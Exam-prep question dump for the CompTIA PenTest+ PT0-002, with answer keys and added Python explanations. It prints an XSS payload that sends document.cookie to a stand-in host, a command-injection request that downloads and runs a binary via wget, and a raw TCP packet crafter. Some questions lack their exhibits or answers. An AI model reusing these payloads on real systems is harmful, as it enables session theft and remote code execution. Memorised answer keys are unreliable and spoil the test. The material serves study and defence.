[Q40-Q57] 2023 Reliable Study Materials & Testing Engine for PT0-002 Exam Success!


NEW QUESTION # 40
A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the following is the BEST option for the tester to take?

  • A. Scan the firewall for vulnerabilities.
  • B. Apply patches to the firewall.
  • C. Segment the firewall from the cloud.
  • D. Notify the client about the firewall.

Answer: D


NEW QUESTION # 41
A penetration tester ran the following commands on a Windows server:

Which of the following should the tester do AFTER delivering the final report?

  • A. Remove the tester-created credentials.
  • B. Downgrade the svsaccount permissions.
  • C. Close the reverse shell connection.
  • D. Delete the scheduled batch job.

Answer: A


NEW QUESTION # 42
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent this type of attack? (Choose two.)

  • A. Parameterized queries
  • B. Base64 encoding
  • C. Web-application firewall
  • D. Output encoding
  • E. Session tokens
  • F. Input validation

Answer: D,F

Explanation:
The code is URL-encoded (+ and %20 stand for spaces); decoded, it is the classic cookie-theft script that creates an Image object whose src is an attacker host with document.cookie appended, i.e. cross-site scripting used to exfiltrate the victim's session cookie. Output encoding translates special characters into an equivalent form that is no longer dangerous in the target interpreter, for example rendering < as &lt; when writing to an HTML page, so the injected script is displayed as text rather than executed. Input validation rejects or constrains untrusted data before it is stored or reflected. Parameterized queries address SQL injection, not XSS; Base64 is an encoding, not a security control; a web-application firewall is a compensating control that signature-aware payloads can evade; and session tokens are precisely what this payload steals.
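The two controls the answer names, shown side by side in Python as an added example (not code from the original page). PAYLOAD is the question's script decoded from its URL-encoded form exactly as printed (the closing quote after hacker/ is missing in the page's copy too); the comment form, the username field, and the function names are constructed for the demonstration. Output encoding is the control for free text that must be displayed (a comment), while allow-list input validation is the control for fields with a known shape (a username).

```python
"""Added example, not part of the original page: output encoding and
allow-list input validation against the cookie-theft XSS payload."""
import html
import re
from urllib.parse import unquote_plus

# The question's payload, URL-decoded as given (+ and %20 become spaces).
PAYLOAD = unquote_plus(
    '<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>')


def render_vulnerable(comment):
    """Untrusted text concatenated straight into the page: the browser
    parses the <SCRIPT> element and sends document.cookie to the attacker."""
    return '<p class="comment">%s</p>' % comment


def render_safe(comment):
    """Output encoding: < > & " ' become HTML entities, so the same bytes
    are displayed as text instead of being parsed as markup or script."""
    return '<p class="comment">%s</p>' % html.escape(comment, quote=True)


# Allow-list for a field with a known shape (a username). Block-listing
# "<script>" is the wrong approach: case and encoding variants slip past it.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def is_valid_username(value):
    """Input validation: accept only what the field legitimately needs."""
    return USERNAME_RE.fullmatch(value) is not None


def contains_live_script(rendered):
    """Demo check: does a real <script ...> tag survive in the output?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))   # script tag intact: exploitable
    print(render_safe(PAYLOAD))         # &lt;SCRIPT&gt;... shown as text
    print(is_valid_username("alice_01"), is_valid_username(PAYLOAD))
```

html.escape is the right primitive only for an HTML text or attribute context; data written into a JavaScript string, a URL, or CSS needs the encoder for that context, which is why output encoding is applied at the point of output rather than once on input.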


NEW QUESTION # 43
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:

Explanation:


NEW QUESTION # 44
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

  • A. Nmap
  • B. tcpdump
  • C. hping3
  • D. Scapy

Answer: D

Explanation:
Scapy is a Python packet-crafting library in which every header field can be set explicitly, including the TCP data offset (header length) and checksum; fields left unset are computed when the packet is built, and the reply can be captured and dissected in the same script. Nmap and tcpdump do not craft arbitrary packets, and hping3 is driven from the command line rather than programmatically.
https://0xbharath.github.io/art-of-packet-crafting-with-scapy/scapy/creating_packets/index.html
https://scapy.readthedocs.io/en/latest/introduction.html#about-scapy
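What Scapy does for the tester when it builds such a packet, written out by hand in standard-library Python as an added example (not code from the original page or from Scapy): the TCP header is packed field by field, the checksum is computed over the IPv4 pseudo-header, and both the data offset and the checksum can be overridden with arbitrary numbers. The addresses 192.0.2.10 and 192.0.2.20 are constructed documentation addresses; port 3011 is the one in the question. Sending needs a raw socket and root, so the block stops at the bytes.

```python
"""Added example, not part of the original page: craft a TCP segment with
a correct or deliberately bogus header length and checksum."""
import socket
import struct


def inet_checksum(data):
    """RFC 1071 ones'-complement checksum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _pseudo_header(src_ip, dst_ip, tcp_len):
    """IPv4 pseudo-header the TCP checksum also covers."""
    return struct.pack("!4s4sBBH", socket.inet_aton(src_ip),
                       socket.inet_aton(dst_ip), 0, socket.IPPROTO_TCP, tcp_len)


def build_tcp(src_ip, dst_ip, sport, dport, payload=b"", flags=0x02,
              seq=0, ack=0, window=8192, data_offset=None, chksum=None):
    """Return TCP header + payload. data_offset (header length in 32-bit
    words) and chksum default to correct values; pass explicit numbers to
    corrupt them, which is the 'invalid packet' the question asks about."""
    words = 5 if data_offset is None else data_offset
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                      (words & 0xF) << 4, flags, window, 0, 0)
    if chksum is None:
        chksum = inet_checksum(_pseudo_header(src_ip, dst_ip,
                                              len(hdr) + len(payload)) + hdr + payload)
    # splice the (possibly bogus) checksum into bytes 16..17 of the header
    hdr = hdr[:16] + struct.pack("!H", chksum & 0xFFFF) + hdr[18:]
    return hdr + payload


def parse_tcp(segment):
    """Dissect the fixed 20-byte header so the fields can be inspected."""
    sport, dport, seq, ack, off_res, flags, window, chksum, urg = struct.unpack(
        "!HHIIBBHHH", segment[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "data_offset": off_res >> 4, "flags": flags, "window": window,
            "chksum": chksum, "urg": urg}


def checksum_ok(src_ip, dst_ip, segment):
    """The receiver's check: the ones'-complement sum over pseudo-header
    and segment, checksum field included, must come out as zero."""
    return inet_checksum(_pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


if __name__ == "__main__":
    SRC, DST, PORT = "192.0.2.10", "192.0.2.20", 3011
    good = build_tcp(SRC, DST, 40000, PORT, b"PING")
    bad = build_tcp(SRC, DST, 40000, PORT, b"PING", data_offset=15, chksum=0xDEAD)
    print(parse_tcp(good), checksum_ok(SRC, DST, good))
    print(parse_tcp(bad), checksum_ok(SRC, DST, bad))
    # To actually send: socket.socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as root,
    # then sendto(bad, (DST, 0)); the kernel prepends the IP header.
```

In Scapy the same thing is one line, e.g. TCP(dport=3011, dataofs=15, chksum=0xdead), because any field given explicitly is sent as-is and only unset fields are computed; the block above shows what that shortcut is doing to the bytes on the wire.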


NEW QUESTION # 45
Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?

  • A. Remediation
  • B. Methodology
  • C. Metrics and measures
  • D. Executive summary

Answer: A

Explanation:
The most important information to have on a penetration testing report that is written for the developers is remediation. Remediation is the process of fixing or mitigating the vulnerabilities or issues that were discovered during the penetration test. Remediation guidance should include specific recommendations, best practices, and resources to help the developers improve the security of their applications.


NEW QUESTION # 46
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client.
Which of the following best describes the NEXT step in the engagement?

  • A. Scheduling of follow-up actions and retesting
  • B. Review of the lessons learned during the engagement
  • C. Acceptance by the client and sign-off on the final report
  • D. Attestation of findings and delivery of the report

Answer: D


NEW QUESTION # 47
A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists. Which of the following should be the FIRST step to plan the reconnaissance activities?

  • A. Conduct a ping sweep of the company's netblocks.
  • B. Launch an external scan of netblocks.
  • C. Check WHOIS and netblock records for the company.
  • D. Use DNS lookups and dig to determine the external hosts.

Answer: D


NEW QUESTION # 48
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client's expectations?

  • A. OWASP Top 10
  • B. The Diamond Model of Intrusion Analysis
  • C. MITRE ATT&CK framework
  • D. NIST Cybersecurity Framework

Answer: C


NEW QUESTION # 49
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?

  • A. taskkill /IM "apache" /F
  • B. rm -rf /tmp/apache
  • C. grep -v apache ~/.bash_history > ~/.bash_history
  • D. chmod 600 /tmp/apache

Answer: B

Explanation:
The Path parameter carries a command injection: the %0A newlines break out of the value the CGI builds, and /bin/sh runs a script that changes to /tmp, downloads a file named apache from 10.10.0.1, makes it executable and runs it. Post-engagement cleanup means removing the artifacts the test left on the client's system, so the dropped file /tmp/apache must be deleted. taskkill is a Windows command while the target runs /bin/sh, rewriting .bash_history hides activity rather than removing the artifact, and chmod 600 leaves the file in place.
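Working out the cleanup from the exploit itself, as an added Python example (not from the original page): the Path parameter is URL-decoded and the ${IFS} separators expanded to show the injected shell line, then the script is walked to list the files it wrote on the target. The function names are constructed for this demonstration; the request is the question's, reassembled on one line. rm -f is used for the file rather than the answer key's rm -rf, since the artifact is a single file.

```python
"""Added example, not part of the original page: decode the exploit's Path
parameter and derive what it left on the target for post-engagement cleanup."""
import posixpath
import shlex
from urllib.parse import unquote, urlsplit

# The request line from the question, reassembled on one line.
EXPLOIT = ("POST /cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS}-c${IFS}"
           "'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777"
           "${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a HTTP/1.1")


def injected_command(request_line):
    """Return the text smuggled in through Path, URL-decoded, with ${IFS}
    (the shell's default field separator, used to avoid literal spaces the
    CGI might filter) expanded. The %0A newlines break out of the quoted
    value the CGI builds, which is why the result starts and ends with a
    lone quote character."""
    target = request_line.split(" ")[1]
    query = target.partition("?")[2]
    for pair in query.split("&"):          # split only on '&'; ';' is shell syntax here
        key, _, value = pair.partition("=")
        if key == "Path":
            return unquote(value).replace("${IFS}", " ")
    raise ValueError("no Path parameter in request")


def dropped_files(command):
    """Walk each 'sh -c' script: follow cd, and record the path every wget
    writes (by default the URL's basename in the current directory)."""
    files = []
    for line in command.splitlines():
        try:
            argv = shlex.split(line)
        except ValueError:                 # the stray quotes from the breakout
            continue
        if len(argv) < 3 or not argv[0].endswith("sh") or argv[1] != "-c":
            continue
        cwd = "/"
        for stmt in argv[2].split(";"):
            words = shlex.split(stmt)
            if not words:
                continue
            if words[0] == "cd" and len(words) > 1:
                cwd = posixpath.normpath(posixpath.join(cwd, words[1]))
            elif words[0] == "wget":
                name = posixpath.basename(urlsplit(words[-1]).path) or "index.html"
                files.append(posixpath.join(cwd, name))
    return files


def cleanup_commands(files):
    """The post-engagement step: remove what the exploit dropped."""
    return ["rm -f " + shlex.quote(path) for path in files]


if __name__ == "__main__":
    cmd = injected_command(EXPLOIT)
    print(cmd)
    for c in cleanup_commands(dropped_files(cmd)):
        print(c)
```

The same walk also tells the report what to say: a world-writable, world-executable binary was placed in /tmp and executed, which is the finding, and the listed paths are the cleanup evidence the client can verify after the engagement.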


NEW QUESTION # 50
A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, slowing the website's response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?

  • A. Rescheduling
  • B. DDoS defense
  • C. Situational awareness
  • D. Deconfliction

Answer: D

Explanation:
Deconfliction is the act of checking whether observed activity (here, the GET flood) comes from the authorized test or from a real attacker, so that the client's responders neither ignore a genuine attack nor block or escalate the engagement.
https://redteam.guide/docs/definitions/


NEW QUESTION # 51
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

  • A. Assume the alert is from the penetration test.
  • B. Halt the penetration test.
  • C. Contact law enforcement.
  • D. Deconflict with the penetration tester.

Answer: D

Explanation:
Deconflicting with the penetration tester is the best thing to do next after the security alarms are triggered during a penetration test, as it will help determine whether the alarm was caused by the tester's activity or by an actual threat. Deconflicting is the process of communicating and coordinating with other parties involved in a penetration testing engagement, such as security teams, network administrators, or emergency contacts, to avoid confusion or interference.


NEW QUESTION # 52
A penetration tester is reviewing the following SOW prior to engaging with a client:
"Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner." Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)

  • A. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
  • B. Retaining the SOW within the penetration tester's company for future use so the sales team can plan future engagements
  • C. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
  • D. Using a software-based erase tool to wipe the client's findings from the penetration tester's laptop
  • E. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team
  • F. Seeking help with the engagement in underground hacker forums by sharing the client's public IP address

Answer: E,F

Explanation:
Withholding critical vulnerabilities from the client to please its senior leadership (E) breaks the tester's duty to report findings honestly, and seeking help in underground forums by posting the client's public IP address (F) discloses confidential engagement details to unknown third parties. Delivering findings with public-key cryptography (A) and wiping them with a software-based erase tool (D) are exactly what the SOW calls for, retaining the SOW for planning future work (B) is normal business practice, and the SOW does not prohibit proprietary tooling (C).


NEW QUESTION # 55
Which of the following BEST describe the OWASP Top 10? (Choose two.)

  • A. A web-application security standard
  • B. A checklist of Apache vulnerabilities
  • C. A list of all the risks of web applications
  • D. The risks defined in order of importance
  • E. A risk-governance and compliance framework
  • F. The most critical risks of web applications

Answer: D,F


NEW QUESTION # 56
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

  • A. Disable HTTP/301 redirect configuration.
  • B. Create an out-of-band network for management.
  • C. Disable or upgrade SSH daemon.
  • D. Enforce enhanced password complexity requirements.
  • E. Implement a better method for authentication.
  • F. Eliminate network management and control interfaces.

Answer: B,E

Explanation:
The intercepted request authenticates with HTTP Basic, which only Base64-encodes the username and password, so anyone who can observe the traffic recovers the credentials; a stronger authentication method (E) is the fix. Exposing the management interface on the production network lets any compromised production host reach it, so management traffic belongs on a separate out-of-band network (B). Nothing in the findings concerns a 301 redirect (A), eliminating management interfaces altogether (F) is not practical, and password complexity (D) does not help when the password is recoverable from the request.
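Turning the intercepted request into a concrete finding, as an added Python example (not from the original page): the Authorization header is parsed, the Basic token is Base64-decoded back to user:password, and the observations are mapped to the two recommendations. The capture is constructed with the well-known credential admin:password, because the Base64 string printed in the question is not reproduced cleanly on the page; the function names and the report wording are assumptions for the demonstration.

```python
"""Added example, not part of the original page: recover HTTP Basic
credentials from a captured request and map the finding to recommendations."""
import base64
import binascii

# Constructed capture, same shape as the request in the question.
CAPTURE = (
    "GET /login HTTP/1.1\r\n"
    "Host: 10.50.100.16\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\r\n"
    "Accept-Language: en-US,en;q=0.5\r\n"
    "Connection: keep-alive\r\n"
    "Authorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n"   # base64("admin:password")
    "\r\n"
)


def parse_headers(raw):
    """Header block of an HTTP/1.1 request as a dict with lower-cased names."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:      # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def basic_credentials(headers):
    """Return (user, password) if the request carries HTTP Basic auth, else
    None. Basic is an encoding, not encryption: whoever reads the request on
    the wire, in a proxy log or in a packet capture gets the cleartext."""
    scheme, _, token = headers.get("authorization", "").partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, _, password = decoded.partition(":")
    return user, password


def findings(headers, over_tls, on_production_net):
    """Map what was observed to the recommendations for the report."""
    out = []
    creds = basic_credentials(headers)
    if creds:
        out.append("HTTP Basic authentication in use; credentials recoverable "
                   "from the request (user %r). Implement a better method for "
                   "authentication." % creds[0])
        if not over_tls:
            out.append("Credentials transmitted over plain HTTP, readable by "
                       "anyone on the path. Require TLS at minimum.")
    if on_production_net:
        out.append("Management interface reachable from the production network. "
                   "Create an out-of-band network for management.")
    return out


if __name__ == "__main__":
    hdrs = parse_headers(CAPTURE)
    print(basic_credentials(hdrs))
    for f in findings(hdrs, over_tls=False, on_production_net=True):
        print("-", f)
```

Password complexity does nothing against this finding: a 40-character password decodes from the header just as easily as "password" does, which is why the recommendation targets the authentication method and the network placement rather than the password policy.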

